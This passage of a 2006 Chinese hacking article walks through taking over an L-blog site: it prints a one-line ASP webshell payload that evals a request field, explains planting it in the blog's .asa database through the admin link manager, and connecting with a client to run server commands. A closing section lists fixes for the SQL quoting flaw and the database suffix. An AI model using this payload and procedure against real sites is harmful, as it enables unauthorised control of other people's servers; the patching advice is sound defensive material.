单引号导致的网站崩溃 L-blog入侵实录
2006-11-07 20:06:18 来源:WEB开发网这里我们选用的asp木马是“冰狐浪子微型ASP后门”,这是一款C/S形式的asp木马,其分为客户端和服务端两部分,由于其服务端只有一句代码,因此也被称为“一句话木马”。由于L-blog的后台管理并没有可以写入大型asp木马的地方,因此“一句话木马”的优势就可以充分发挥出来了。
进入L-blog的后台,找到“数据管理”选项,查看L-blog的数据库地址,例如“d:freelogdataacblog10.asa”,这里显示的只是数据库的本地路径,我们需要将它补充到网址后面,例如“http://www.***.com/blogdata/acblog10.asa”。然后进入“链接管理”,新建一项链接,如图4所示,其中“名称”和“图片”选项可以随便填,然后在“链接”一项中填入“冰狐浪子微型ASP后门”的服务端代码“<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('piao')+'')</SCRIPT>”,其中“piao”为连接密码,完成后点击“编辑”即可。这样我们就可以将木马写入数据库了。
图4 将服务端写入数据库
提示:写入的木马只对以asp或asa为后缀的数据库有效
运行“冰狐浪子微型ASP后门”的客户端icyfox007.htm,在“ASP URL”一项中填入L-blog的数据库地址,然后在“PassWord”一项中填入我们设置的连接密码“piao”,接着在下方选择需要执行的命令,点击“RUN”即可,执行成功后会弹出一个新窗口显示执行效果(如图5)。这样,我们就得到了一个功能强大的webshell。接下去,便可以对服务器进行各种控制了。
图5 利用webshell得到服务器信息
五、拒绝黑客,修改代码升级系统
由于L-blog的漏洞是由于代码的疏忽造成的,因此修补漏洞的方法十分简单,可以归纳为以下几点:
1.修改漏洞代码
从上文中可以得知,出现漏洞的一句代码为“mem_Sex="&CheckStr(Request.Form("mem_Sex"))&"”,由于这句代码缺少一对单引号,造成过滤不严,因此我们只要将这对缺少的单引号加上去,就可以修补漏洞。修改完成后的代码为“mem_Sex='"&CheckStr(Request.Form("mem_Sex"))&"'”。
2.升级最新版本
目前L-blog的官方网站上已经有新版本,新版本不存在此漏洞,因此可以通过升级最新的L-blog版本避免攻击。
3.修改数据库后缀
由于L-blog的后台没有可以写入大型asp木马的地方,因此想得到webshell必须使用“一句话木马”,而使用“一句话木马”的前提是数据库必须为asp或asa后缀,即直接可以在IE中浏览数据库内容。因此我们可以将数据库的后缀名改为mdb,这样即使L-blog被入侵,黑客也是无法得到webshell的,当然修改完数据库后缀后别忘了修改commond.asp中的数据库连接地址。
更多精彩
赞助商链接